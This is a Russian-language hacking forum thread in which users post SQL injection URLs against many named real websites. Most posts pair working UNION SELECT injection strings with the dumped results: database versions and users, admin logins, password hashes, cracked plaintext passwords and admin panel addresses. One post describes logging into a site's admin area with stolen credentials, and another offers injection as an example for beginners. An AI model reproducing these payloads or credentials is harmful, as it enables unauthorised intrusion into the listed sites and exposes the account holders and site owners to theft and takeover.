маленькая порция от меня=) PR 5 version(): 4.0.27-standard user(): conway_oxanshop@localhost database(): conway_oashop так же есть раскрытие путей до домашней папки: Apache/1.3.34 PR 4 version(): 5.0.51a-community user(): ianshop@localhost database(): ianshop_wordpress есть раскрытие путей до домашнего каталога: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6 PR 1 version(): 5.0.45-log user(): [email protected] database(): u8509 PR N/A version(): 4.1.16-standard user(): [email protected] database(): philip19_db1
какбы без полей вывода.... (мб я просто ненашел) www.earthfiles.com Google PR 6 / 10 + че сегодня за день???
2 Dimi4 Вывод есть ,только с извратами ID должно быть положительным , поэтому and, и 2 столбец должен содержать существующее значение .Ветка пятая вывод в title. _http://www.earthfiles.com/news.php?ID=1434+and+1=2+union+select+1,version(),3,concat_ws(0x3a,User(),Database(),Version())+from+information_schema.tables--
funnymoneyreport.com (70.87.174.182) database() roguegov_rgov version() 4.1.22-standard user() roguegov_publicr@localhost TABLE_NAME news
http://www.ci.bremerton.wa.us/display.php?id=2+union+select+1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14--
http://www.lggroup.us http://www.lggroup.us/news.php?id=-2+union+select+1,2,concat(user,0x3a,pass),4,5+from+users-- lgg:dancing5678
bata.com (213.30.168.66) Database Version: 5.0.15-nt Database name: bata-com User name: prod-bata-com@localhost Вот это я понимаю удобно, вывод без ограничений Интересные таблицы: Вывод всех полей: Собстна юзеры: найденные пароли (первая пятерка): 1 : : ldehon : : 456 : : [email protected] 2 : : test : : test : : [email protected] 3 : : lboulet : : 6880 : : [email protected] 4 : : rsp : : 456 : : 5 : : csp : : 456 : : Мистика каято.. у большинства пароль 456
сайт налоговой милиции в одессе http://www.nalog.od.ua/a.php?article_id=4680&rid=-1+union+select+1,2,3,4,column_name,6,7,8+from+information_schema.columns+where+table_name=0x75736572+limit+1,1--
gangs - менты это хорошо.. админка: /edit natasha:0444730b0844225c - ************ Grey: Тема не для вопросов.
5.0.45-log http://vestipk.ru/forum/admin vestipk:f00bb259f87de37586b7b51c2fee1dd6:dtnth ================================================== 4.1.11-Debian_4sarge7 admin:m3mph15 admin:e54f5e626948378243ddc7fd8fb88752:pusikurac =================================================== 4.1.11-Debian_4sarge7 admin:4dm1n =================================================== 4.1.20-log 21к юзеров булки - md5(md5($pass).$salt) GamersHood:e4d886385fb7b53083fadd97a66b5078:;0N =================================================== root:773214e90eb99bdb:111 uainfo:1cdbd77479a6b181 5.0.37 67к юзверей =================================================== 5.0.26 ftpsigep:326bc18760bb7138:info777 ftpboletin:1723474445ad5325: ftpsecmayores:6461d4e9239d87ba:lv426 root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8: ftpamt:*3B4AA1C58CB4B241822483358B14ED70C830C33F:amtweb ftpdeportes:*2F6FD4EDD929DA2998595EA8F162F21AD2EFAFA5: dbprensa3:*75812E11D73622956C8693C9164934DC38F40124: ftpcerrillos:*C661E8BABAD3C854A461AD6A830C38C785FBE8BA: ftpucc:*0A14D7147DA45C5B8BA525993480BC94B7F75A28:gx260 estadisticas:*426555DC02DB082487C32416E9326EDCA3F68E38:est123 ftpdgpt:*75E5018AC4C15AE017D4CD9B45AF4E53F42AEA05: ipvuser:*33D85363B065BDB9BA1D6242CD4F5F9324C67094: ftpregistro:*D626480368E2CEC93C5ABD6C9413125A3A54C338: ftpsalud:*A289157FE5C507B08970E7D15A183D29B57960ED:liga18 script:*8FD8A99335F1F8A3A24A3E1088EAA3C872EE65D8:script juan:*7ABD7F0A2A70C30B46E318E3A647A90D21D7696C:mis6524 jfg:*7541914222C92705D642485C0125B8F8618F0711:quelonio ftpenresp:*864CD7CDBABFB1C493EAB982781CBB99BB48519F:enteweb ftpmuniyrigoyen:*D16B3D7319F09B3493F7F35E090A9EF6F2477C26: ARIELelikan POLICIAS:VIAL AMT:TAXI =================================================== root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8:localhost ARIELelikan POLICIAS:VIAL AMT:TAXI
http://www.hofigal.eu/produse.php?id=-446+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/* Database Version: 4.1.22-standard-log Database name: hofigal_hofigal User name: [email protected] Tables: admin users- user_id, username, password hofigal:tazmanian в таблице админ не смог подобрать колонки www.hofigal.eu/admin спасибо за внимание пример для новичков http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,2,3,4/* выводит поля ....вроде все норм, но при http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,concat_ws(user(),database(),version()),3,4/* ошибка,многие забросили бы.... но не надо забывать про AES_ENCRYPT и AES_DECRYPT и конечно же LIMIT а вот и результат http://www.carpediemtransport.ro/stirea.php?id=1+UNION+SELECT+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),3,4+LIMIT+1,1/* Database Version: 4.1.11-nt Database name: carpediemtravel User name: carpediem@localhost жаль что не подобрал таблицы... спасибо всем http://www.apd.ro/proiect.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(version(),0x3a,database(),0x3a,user()),0x71),0x 71),4,5,6,7,8/* Database Version: 4.1.11-nt Database name: carpediemtravel User name: carpediem@localhost таблицы не подобрал...но сильно и не старался http://www.remediiflorale.ro/remedii_detalii.php?ID=1+union+select+1,2,3,concat _ws(user(),database,version()),5,6,7,8,9+limit+1,1 /* Database Version: 4.1.22-standard Database name: remediif_remediiflorale User name: remediif_cabat@localhost подобрал только phpbb_users user_email, user_password , username [email protected]:71d2313de7268950bb abc4bcea2db583:remediiflorale хеш не брутил...кто имеет желание....пожалуйста всем спасибо http://www.gfialomita.ro/det_public.php?id=-1'+UNION+SELECT+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7/* Database Version: 4.1.21-log Database name: gfialomita User name: root@localhost нашёл в базе mysql.user password : user 7864ed0a46b1e475:root пароль был найден на hashcracking.info за что огромное спасибо Lebed pass : market всем спасибо http://www.lilstructuraldesign.ro/work.php?id=1+UNION+SELECT+1,2,3,4,concat_ws(0x3a, user(),version(),database()),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58+LIMIT+1,1/* Database Version: 4.1.22-standard Database name: lil_web User name: lil_web@localhost нашел users: id, pass, user amro:b4af804009cb036a4ccdc33431ef9ac9: pass1234 www.lilstructuraldesign.ro/admin пасс к сожалению не подходит фтп у них публик... спасибо всем http://www.darvari.ro/index.php?id=2+UNION+SELECT+1,CONCAT_WS(0x3a,user( ),version(),database()),3,4,5,6,7,8,9+LIMIT+1,1/* Database Version: 4.1.20-log Database name: shdarvariro User name: [email protected] нашёл phpbb_users user_email, user_password, username [email protected]:$H$98LNbj3Sb0XchuuOz azRcHsqkYied0.:CristianSurdu [email protected]:fde4fc933d4371c52414 7a4699484248apusoiu Cristian [email protected]:282bbbfb69da08d03ff4bcf34a94b c53:Viorel Doloc [email protected]:d901619e37d52078ec5765b3df dd8680:florin-v [email protected]:4dd77ecaf88620f5da8967bb d91d9506:adi.oprea [[email protected]:$H$9ud2wu9dbIjhULsv2FFVYqLcb/7XD70:vali nedelea и так далее, хеши не брутил... милости просим всеx желающих http://www.gimco-rentacar.ro/veicolo.php?id=1+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7+limit+1,1/* интересный вывод..кто захочет тот поймёт.. таблы к сожаленю не подобрал Database Version: 4.1.21-standard-log Database name: gimco_cms User name: gimco_cms@localhost http://www.intorsura.ro/clubrestdisc/estaur.php?id=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11+limit +1,1 Database Version: 4.1.22-standard-log Database name: intors_intorsura User name: intors_jymmy5@localhost admin nume,parola Joos:jooti1103 ЗЫ. Хорошо знать много языков.... иногда колонки попадаются и такие..переведённые http://www.intorsura.ro/admin/utilizatori/login/admin.php without password http://www.3la3.ro/detalii_stire.php?id=31+UNION+SELECT+1,2,3,concat_ ws(0x3a,user(),version(),database()),5,6,7,8,9,10, 11,12,13+LIMIT+1,1/* Database Version: 5.0.45-community Database name: sportare_sportarena User name: sportare_kadour@localhost administratori: drogo:c973dec0d6f378c500a1dadc14149887 valau:c973dec0d6f378c500a1dadc14149887 constu:e7b67b0bf3aa2a72dc31458acd5f905f operator:08fbb70044e49261bb4d40262144c791:ziani pedro:4a5970427c6a784b930b0668b1189c8b http://www.3la3.ro/admin спасибо за внимание http://www.psc.ro/comunicate_detalii.php?id=1+UNION+SELECT+1,concat_ ws(0x3a,user(),version(),database()),3,4,5,6,7/* Database Version: 4.1.20-log Database name: netpscro User name: [email protected] таблы подобрать не смог http://www.generatoare.ro/listare.php?id=1'+union+select+1,2,aes_decrypt(aes _encrypt(concat(0x3a,version(),0x3a,database(),0x3 a,user()),0x71),0x71),4,5+LIMIT+1,1/* Database Version: 4.1.12 Database name: generatoare User name: generat_oare@localhost смотрим в хедере...или сурс откройте users: columns: id,email,nume,parola http://www.corso-automobile.ro/detalii.php?id=1+UNION+SELECT+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14+LIMIT+1,1/* Database Version: 5.0.45-community-log Database name: delsoftr_corsoautomobile User name: delsoftr_vlad@localhost в БД >13 базочек... копайтесь сами.пароли там в открытом виде.удачи delsoftr_adan delsoftr_adan2 delsoftr_adantrans delsoftr_autocentrusibiu delsoftr_auto delsoftr_autostock delsoftr_autostyleWWW delsoftr_autotest delsoftr_autotest delsoftr_delcar delsoftr_delcar2 delsoftr_delcarmoreni delsoftr_delsoft delsoftr_demogestiune ...... http://www.topline.ro/stiri.php?id=1'+union+select+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,Version(),Database(),User()),0 x71),0x71),3,4,5+limit+1,1/* Database Version: 5.0.18 Database name: topline User name: root@localhost в БД 2 базы 1.mysql 2.topline в первой инфа о БД, юзер пасс..и т.д.и.т.п. во вторй есть админы вернее админ, так как он там один вроде login: admin password: parola123 http://www.topline.ro/admin на сегодня всё..всем спасибо за проявленное внимание..ваш покорный слуга Горев
http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),version(),user(),database()),5,6,7/* 5.0.22/[email protected]/redlynxcom http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),login,password,email,admin),5,6,7+from+iman_users/* ------------------------------------------------------------------------ http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),version(),user(),database()),4/* 5.0.45-community/avpkfco_avangard@localhost/avpkfco_1 http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),id,email,pwd),4+from+avgdusers/* ------------------------------------------------------------------------ http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11/* 4.1.20-log/iwdp@localhost/iwdp http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* ------------------------------------------------------------------------ http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7,8,9/* 4.1.20-standard/pauling4_log1@localhost/pauling4_ingnetstock http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9+from+users/* ------------------------------------------------------------------------ http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),version(),user(),database()),3,4+from+users/* 5.0.45/lewes@localhost/lewesbaptistchurch_eastgate http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),username,password),3,4+from+users+limit+0,1/* ------------------------------------------------------------------------ http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 5.0.51a-community/matthewj_main@localhost/matthewj_main http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mj_users+limit+151-- moodesign:sinead PЗаходим на http://www.matthew-james.co.uk/login.php и вводим Username и Password. Воля! Мы в Админке Я старался)) Говорят, что цвета немного глаза режут, но я уже ничего менять не буду))
Jeroenwijering.com - PR 8 Inderscience.com - PR 7 жаль не плучилось шелл залить.. фильтрует кавычки..( Butv10.com - PR 6 Earthfiles.com - PR 6 чтобы получить вывод нужно заплатить..)) me платить не будет.) Shocktillyoudrop.com - PR 6 Fm.gov.lv - PR 6 скуль...? Fadetoblack.com - PR 5 (c) VITAL
http://www.roviniete.ro/detalii_vignete_europa.php?id=1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+limit+1,1/* Database Version: 5.0.45 Database name: rovini_roviniete User name: rovini_usrrovi@localhost admins : dan:7c4014be271c668dffa7911537fc3203 rbd:8b6a8a4e9fd167ad9dfeabd502ebace3: makaveli админку не нашел... на морде есть логин для клиентов http://www.santo-raphael.ro/product.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),user(),database()),14,15,16,17,18+limit+1,1/* Database Version: 4.1.14 Database name: shop User name: admin@localhost tables admin колонки которые подобрал не интересные: email,id, phone mysql.user колонки pasword, user admin:2ef439381b2bdf7b: galeon usr_market:2ef439381b2bdf7b : galeon админку не искал..на морде логин для клиентов
www.02.ru - Правоохранительный портал _http://www.02.ru/zakon/index.php?id_mz=15+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4/* USER: ru183180_02ru@localhost VERSION: 4.0.27-log DATABASE: ru183180_02rudb Они даже себя засчищать не хотят
